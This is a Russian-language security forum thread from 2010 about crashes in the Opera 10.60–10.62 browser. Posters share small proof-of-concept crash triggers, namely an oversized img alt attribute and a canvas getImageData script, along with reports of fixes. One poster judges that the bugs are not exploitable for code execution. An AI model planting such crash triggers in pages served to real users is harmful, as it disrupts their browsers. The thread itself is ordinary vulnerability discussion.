PDA

Просмотр полной версии : Opera 10.60 переполнение буфера


BlackFan
13.07.2010, 16:41
Сегодня случайно нашел...
Вроде бы еще нигде не выкладывалось
<img alt="aaaa[65536]">

Примерчик:
blackfan.freehostia.com/operatest/crash.htm

ps: тестил только на win версии

root_sashok
13.07.2010, 16:52
В Linux крешит. Да и вообще, 10.60 бажная.

padla
13.07.2010, 16:52
под макосью опера тоже упала, интересно))

banana
14.07.2010, 02:45
http://gyazo.com/5d37a275820daa7090a79d6ce93def39.png

total90
14.07.2010, 03:08
10.54-тоже креш

root_sashok
14.07.2010, 22:02
<html>
<body onload="Opera()">
<script language=JavaScript>
function Opera() {
canvas = document.getElementById("canvas");
ctx = canvas.getContext("2d");
ctx.getImageData(0,0,0x20000,0x20000);
}
</script>
<canvas id=canvas width=10 height=10></canvas>
</body>
</html>

Вот этот выбивает моментально.

v00d00
02.08.2010, 18:02
root_sashok, работает! 10.60 вылетела моментально.

root_sashok
02.08.2010, 23:39
Пофиксили в новом билде. И Canvas, и Memory Leaks.
Новый билд: Windows (http://snapshot.opera.com/windows/15204_10.61-3476/Opera_1061_3476_in.exe), Linux (http://snapshot.opera.com/unix/15204_10.61-6422/), Mac (http://snapshot.opera.com/mac/15204_10.61-8422/Opera_10.61_8422_Intel.dmg).

SulikoshkA
03.08.2010, 00:55
http://securityvulns.ru/news/Opera/1002.html

root_sashok
03.08.2010, 01:50
http://securityvulns.ru/news/Opera/1002.html

Это 10.10.

destiny
14.08.2010, 00:16
Вот этот выбивает моментально.

в 10.61 уже нет, поверхностный осмотр говорит, что в 10.60 до Command Execution сплоита это не доделывается

<img alt="aaaa[65536]">

в 10.61 ещё виснет/падает, но это даже не совсем BO :) Висит потому что он долго пытается посчитать размер отображаемого текста как-то скоро начиная прибавлять по одному символу и пересчитывать, а падает вроде бы при каком-то некорректном обрезании этой строки границей области памяти, но передачей неверной длины в ту самую функцию вычисления длины, так что тоже неюзабльно :(

root_sashok
29.08.2010, 20:24
Заметил ещё один интересный баг. Opera 10.61. Если страница запрашивает доступ в локальную сеть, Opera блокирует этот запрос. А если на эту страницу ещё идёт редирект, то при нём Opera вылетает. Страница —> Редирект на страницу с запросом в локальную сеть —> вылет Opera.

root_sashok
22.09.2010, 13:19
Падает 10.62 при просмотре этого файлика: http://upload.wikimedia.org/wikipedia/commons/4/45/Glider.svg

Cross
22.09.2010, 15:31
Контент файла, верней это и есть все что присылает сервер, даже хэдеров нет:
<svg version="1.0" width="140" height="140">
<g transform="translate(10, 10)">
<g id="scale" transform="scale(20)">
<g id="grid" style="fill:none;stroke-linejoin:round;stroke-linecap:butt;stroke:#000000;stroke-width:.1;">
<path d="m 0 0 L 6 0 L 6 6 L 0 6 Z"/>
<path d="M 0 2 L 6 2"/>
<path d="M 0 4 L 6 4"/>
<path d="M 2 0 L 2 6"/>
<path d="M 4 0 L 4 6"/>
</g>
<g id="dots" style="fill:#000000">
<ellipse cx="3" cy="1" rx=".7" ry=".7" id="C1"/>
<ellipse cx="5" cy="3" rx=".7" ry=".7" id="C2"/>
<ellipse cx="1" cy="5" rx=".7" ry=".7" id="C3"/>
<ellipse cx="3" cy="5" rx=".7" ry=".7" id="C4"/>
<ellipse cx="5" cy="5" rx=".7" ry=".7" id="C5"/>
</g>
</g>
</g>
</svg>

oRb
22.09.2010, 15:49
Контент файла, верней это и есть все что присылает сервер, даже хэдеров нет:


Это невозможно. Заголовки:
HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 22 Sep 2010 10:56:24 GMT
Content-Type: image/svg+xml
Last-Modified: Sun, 14 Jun 2009 16:10:44 GMT
Content-Length: 768
ETag: W/"300-4a352104"
X-Cache: MISS from sq48.wikimedia.org
X-Cache-Lookup: MISS from sq48.wikimedia.org:3128
Age: 3077
X-Cache: HIT from amssq54.esams.wikimedia.org
X-Cache-Lookup: HIT from amssq54.esams.wikimedia.org:3128
X-Cache: MISS from knsq21.knams.wikimedia.org
X-Cache-Lookup: MISS from knsq21.knams.wikimedia.org:80
Connection: close

Cross
22.09.2010, 18:11
Это невозможно. Заголовки:
HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 22 Sep 2010 10:56:24 GMT
Content-Type: image/svg+xml
Last-Modified: Sun, 14 Jun 2009 16:10:44 GMT
Content-Length: 768
ETag: W/"300-4a352104"
X-Cache: MISS from sq48.wikimedia.org
X-Cache-Lookup: MISS from sq48.wikimedia.org:3128
Age: 3077
X-Cache: HIT from amssq54.esams.wikimedia.org
X-Cache-Lookup: HIT from amssq54.esams.wikimedia.org:3128
X-Cache: MISS from knsq21.knams.wikimedia.org
X-Cache-Lookup: MISS from knsq21.knams.wikimedia.org:80
Connection: close
Скорее всего HttpFox глюканул?! 3 раза перевповерял - в response было пусто...

Fiddler подтвердил вышепроцитированное...